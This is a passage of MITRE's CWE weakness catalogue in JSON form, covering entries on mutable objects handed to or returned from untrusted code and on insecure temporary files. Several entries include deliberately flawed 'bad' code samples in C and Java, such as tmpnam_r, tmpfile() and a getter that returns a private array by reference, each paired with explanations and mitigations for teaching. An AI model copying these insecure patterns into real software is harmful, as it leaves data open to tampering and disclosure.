Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"373":{"attr":{"@_ID":"373","@_Name":"DEPRECATED: State Synchronization Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry was deprecated because it overlapped the same concepts as race condition (CWE-362) and Improper Synchronization (CWE-662).","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-12","Modification_Importance":"Critical","Modification_Comment":"Deprecated entry"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"State Synchronization Error","attr":{"@_Date":"2010-12-13"}}}},"374":{"attr":{"@_ID":"374","@_Name":"Passing Mutable Objects to an Untrusted Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program sends non-cloned mutable data as an argument to a method or function.","Extended_Description":"The function or method that has been called can alter or delete the mutable data. This could violate assumptions that the calling function has made about its state. In situations where unknown code is called with references to mutable data, this external code could make changes to the data sent. If this data was not previously cloned, the modified data might not be valid in the context of execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Memory","Note":"Potentially data could be tampered with by another function which should not have been tampered with."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Pass in data which should not be altered as constant or immutable."},{"Phase":"Implementation","Description":"Clone all mutable data before passing it into an external function . This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"private:public:","xhtml:div":[{"#text":"int foo;complexType bar;String baz;otherClass externalClass;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"void doStuff() {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"externalClass.doOtherStuff(foo, bar, baz)","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}},"Body_Text":"In this example, bar and baz will be passed by reference to doOtherStuff() which may change them."},{"Intro_Text":"In the following Java example, the BookStore class manages the sale of books in a bookstore, this class includes the member objects for the bookstore inventory and sales database manager classes. The BookStore class includes a method for updating the sales database and inventory when a book is sold. This method retrieves a Book object from the bookstore inventory object using the supplied ISBN number for the book class, then calls a method for the sales object to update the sales information and then calls a method for the inventory object to update inventory for the BookStore.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BookStore {}public class Book {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private BookStoreInventory inventory;private SalesDBManager sales;...public BookStore() {}public void updateSalesAndInventoryForBookSold(String bookISBN) {}...","xhtml:br":["","","","","","",""],"xhtml:i":["// constructor for BookStore","// other BookStore methods"],"xhtml:div":[{"#text":"this.inventory = new BookStoreInventory();this.sales = new SalesDBManager();...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Book book = inventory.getBookWithISBN(bookISBN);sales.updateSalesInformation(book);inventory.updateInventory(book);","xhtml:br":["","","","","",""],"xhtml:i":["// Get book object from inventory using ISBN","// update sales information for book sold","// update inventory"]}}]}},{"#text":"private String title;private String author;private String isbn;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"// Book object constructors and get/set methods"}],"xhtml:br":""}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesAndInventoryForBookSold(String bookISBN) {}...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Book book = inventory.getBookWithISBN(bookISBN);Book bookSold = (Book) book.clone();sales.updateSalesInformation(bookSold);inventory.updateInventory(book);","xhtml:br":["","","","","","","",""],"xhtml:i":["// Get book object from inventory using ISBN","// Create copy of book object to make sure contents are not changed","// update sales information for book sold","// update inventory"]}}}}],"Body_Text":["However, in this example the Book object that is retrieved and passed to the method of the sales object could have its contents modified by the method. This could cause unexpected results when the book object is sent to the method for the inventory object to update the inventory.","In the Java programming language arguments to methods are passed by value, however in the case of objects a reference to the object is passed by value to the method. When an object reference is passed as a method argument a copy of the object reference is made within the method and therefore both references point to the same object. This allows the contents of the object to be modified by the method that holds the copy of the object reference. [REF-374]","In this case the contents of the Book object could be modified by the method of the sales object prior to the call to update the inventory.","To prevent the contents of the Book object from being modified, a copy of the Book object should be made before the method call to the sales object. In the following example a copy of the Book object is made using the clone() method and the copy of the Book object is passed to the method of the sales object. This will prevent any changes being made to the original Book object."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Passing mutable objects to an untrusted method"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ04-J","Entry_Name":"Provide mutable classes with copy functionality to safely allow passing instances to untrusted code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-374"}},{"attr":{"@_External_Reference_ID":"REF-375"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Mutable Objects Passed by Reference","attr":{"@_Date":"2010-06-21"}}}},"375":{"attr":{"@_ID":"375","@_Name":"Returning a Mutable Object to an Untrusted Caller","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function.","Extended_Description":"In situations where functions return references to mutable data, it is possible that the external code which called the function may make changes to the data sent. If this data was not previously cloned, the class will then be using modified data which may violate assumptions about its internal state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":"Modify Memory","Note":"Potentially data could be tampered with by another function which should not have been tampered with."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Declare returned data which should not be altered as constant or immutable."},{"Phase":"Implementation","Description":"Clone all mutable data before returning references to it. This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This class has a private list of patients, but provides a way to see the list :","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class ClinicalTrial {}","xhtml:div":{"#text":"private PatientClass[] patientList = new PatientClass[50];public getPatients(...){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"return patientList;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"While this code only means to allow reading of the patient list, the getPatients() method returns a reference to the class\'s original patient list instead of a reference to a copy of the list. Any caller of this method can arbitrarily modify the contents of the patient list even though it is a private member of the class."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Mutable object returned"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ04-J","Entry_Name":"Provide mutable classes with copy functionality to safely allow passing instances to untrusted code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ05-J","Entry_Name":"Defensively copy private mutable class members before returning their references"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP34-PL","Entry_Name":"Do not modify $_ in list or sorting functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Passing Mutable Objects to an Untrusted Method","attr":{"@_Date":"2010-09-27"}}}},"377":{"attr":{"@_ID":"377","@_Name":"Insecure Temporary File","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Creating and using insecure temporary files can leave application and system data vulnerable to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses a temporary file for storing intermediate data gathered from the network before it is processed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (tmpnam_r(filename)) {}...","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"FILE* tmp = fopen(filename,\\"wb+\\");while((recv(sock,recvbuf,DATA_SIZE, 0) &gt; 0)&amp;(amt!=0)) amt = fwrite(recvbuf,1,DATA_SIZE,tmp);","xhtml:br":["",""]}},"xhtml:br":""}},"Body_Text":"This otherwise unremarkable code is vulnerable to a number of different attacks because it relies on an insecure method for creating temporary files. The vulnerabilities introduced by this function and others are described in the following sections. The most egregious security problems related to temporary file creation have occurred on Unix-based operating systems, but Windows applications have parallel risks. This section includes a discussion of temporary file creation on both Unix and Windows systems. Methods and behaviors can vary between systems, but the fundamental risks introduced by each are reasonably constant."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Temporary File"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"155"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 23, &#34;Creating Temporary Files Securely&#34; Page 682"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Temporary Files&#34;, Page 538"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;File Squatting&#34;, Page 662"}}]},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":["Applications require temporary files so frequently that many different mechanisms exist for creating them in the C Library and Windows(R) API. Most of these functions are vulnerable to various forms of attacks.","The functions designed to aid in the creation of temporary files can be broken into two groups based whether they simply provide a filename or actually open a new file. - Group 1: \\"Unique\\" Filenames: The first group of C Library and WinAPI functions designed to help with the process of creating temporary files do so by generating a unique file name for a new temporary file, which the program is then supposed to open. This group includes C Library functions like tmpnam(), tempnam(), mktemp() and their C++ equivalents prefaced with an _ (underscore) as well as the GetTempFileName() function from the Windows API. This group of functions suffers from an underlying race condition on the filename chosen. Although the functions guarantee that the filename is unique at the time it is selected, there is no mechanism to prevent another process or an attacker from creating a file with the same name after it is selected but before the application attempts to open the file. Beyond the risk of a legitimate collision caused by another call to the same function, there is a high probability that an attacker will be able to create a malicious collision because the filenames generated by these functions are not sufficiently randomized to make them difficult to guess. If a file with the selected name is created, then depending on how the file is opened the existing contents or access permissions of the file may remain intact. If the existing contents of the file are malicious in nature, an attacker may be able to inject dangerous data into the application when it reads data back from the temporary file. If an attacker pre-creates the file with relaxed access permissions, then data stored in the temporary file by the application may be accessed, modified or corrupted by an attacker. On Unix based systems an even more insidious attack is possible if the attacker pre-creates the file as a link to another important file. Then, if the application truncates or writes data to the file, it may unwittingly perform damaging operations for the attacker. This is an especially serious threat if the program operates with elevated permissions. Finally, in the best case the file will be opened with the a call to open() using the O_CREAT and O_EXCL flags or to CreateFile() using the CREATE_NEW attribute, which will fail if the file already exists and therefore prevent the types of attacks described above. However, if an attacker is able to accurately predict a sequence of temporary file names, then the application may be prevented from opening necessary temporary storage causing a denial of service (DoS) attack. This type of attack would not be difficult to mount given the small amount of randomness used in the selection of the filenames generated by these functions. - Group 2: \\"Unique\\" Files: The second group of C Library functions attempts to resolve some of the security problems related to temporary files by not only generating a unique file name, but also opening the file. This group includes C Library functions like tmpfile() and its C++ equivalents prefaced with an _ (underscore), as well as the slightly better-behaved C Library function mkstemp(). The tmpfile() style functions construct a unique filename and open it in the same way that fopen() would if passed the flags \\"wb+\\", that is, as a binary file in read/write mode. If the file already exists, tmpfile() will truncate it to size zero, possibly in an attempt to assuage the security concerns mentioned earlier regarding the race condition that exists between the selection of a supposedly unique filename and the subsequent opening of the selected file. However, this behavior clearly does not solve the function\'s security problems. First, an attacker can pre-create the file with relaxed access-permissions that will likely be retained by the file opened by tmpfile(). Furthermore, on Unix based systems if the attacker pre-creates the file as a link to another important file, the application may use its possibly elevated permissions to truncate that file, thereby doing damage on behalf of the attacker. Finally, if tmpfile() does create a new file, the access permissions applied to that file will vary from one operating system to another, which can leave application data vulnerable even if an attacker is unable to predict the filename to be used in advance. Finally, mkstemp() is a reasonably safe way create temporary files. It will attempt to create and open a unique file based on a filename template provided by the user combined with a series of randomly generated characters. If it is unable to create such a file, it will fail and return -1. On modern systems the file is opened using mode 0600, which means the file will be secure from tampering unless the user explicitly changes its access permissions. However, mkstemp() still suffers from the use of predictable file names and can leave an application vulnerable to denial of service attacks if an attacker causes mkstemp() to fail by predicting and pre-creating the filenames to be used."]}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"}]}},"378":{"attr":{"@_ID":"378","@_Name":"Creation of Temporary File With Insecure Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Opening temporary files without appropriate measures or controls can leave the file, its contents and any function that it impacts vulnerable to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"377","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the temporary file can be read by the attacker, sensitive information may be in that file which could be revealed."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"If that file can be written to by the attacker, the file might be moved into a place to which the attacker does not have access. This will allow the attacker to gain selective resource access-control privileges."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Depending on the data stored in the temporary file, there is the potential for an attacker to gain an additional input vector which is trusted as non-malicious. It may be possible to make arbitrary changes to data structures, user information, or even process ownership."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible."},{"Phase":"Implementation","Description":"Ensure that you use proper file permissions. This can be achieved by using a safe temp file function. Temporary files should be writable and readable only by the process that owns the file."},{"Phase":"Implementation","Description":"Randomize temporary file names. This can also be achieved by using a safe temp-file function. This will ensure that temporary files will not be created in predictable places."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-139"},"Intro_Text":"In the following code examples a temporary file is created and written to.  After using the temporary file, the file is closed and deleted from the file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"FILE *stream;if( (stream = tmpfile()) == NULL ) {}...// remove tmp filermtmp();","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Could not open new temporary file\\\\n\\");return (-1);","xhtml:br":["",""]}},"xhtml:i":"// write data to tmp file"}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":{"#text":"File temp = File.createTempFile(\\"pattern\\", \\".suffix\\");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write(\\"aString\\");out.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"xhtml:br":["",""]}}],"Body_Text":["However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file.","Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users.","Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually \\"/tmp\\" or \\"/var/tmp\\" and on Windows systems the default directory is usually \\"C:\\\\\\\\Windows\\\\\\\\Temp\\", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper temp file opening"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Improper Temporary File Opening","attr":{"@_Date":"2008-04-11"}}}},"379":{"attr":{"@_ID":"379","@_Name":"Creation of Temporary File in Directory with Insecure Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates a temporary file in a directory whose permissions allow unintended actors to determine the file\'s existence or otherwise access that file.","Extended_Description":"On some operating systems, the fact that the temporary file exists may be apparent to any user with sufficient privileges to access that directory. Since the file is visible, the application that is using the temporary file could be known. If one has access to list the processes on the system, the attacker has gained information about what the user is doing at that time. By correlating this with the applications the user is running, an attacker could potentially discover what a user\'s actions are. From this, higher levels of security could be breached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"377","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Since the file is visible and the application which is using the temp file could be known, the attacker has gained information about what the user is doing at that time."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible."},{"Phase":"Implementation","Description":"Try to store sensitive tempfiles in a directory which is not world readable -- i.e., per-user directories."},{"Phase":"Implementation","Description":"Avoid using vulnerable temp file functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-139"},"Intro_Text":"In the following code examples a temporary file is created and written to.  After using the temporary file, the file is closed and deleted from the file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"FILE *stream;if( (stream = tmpfile()) == NULL ) {}...// remove tmp filermtmp();","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Could not open new temporary file\\\\n\\");return (-1);","xhtml:br":["",""]}},"xhtml:i":"// write data to tmp file"}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":{"#text":"File temp = File.createTempFile(\\"pattern\\", 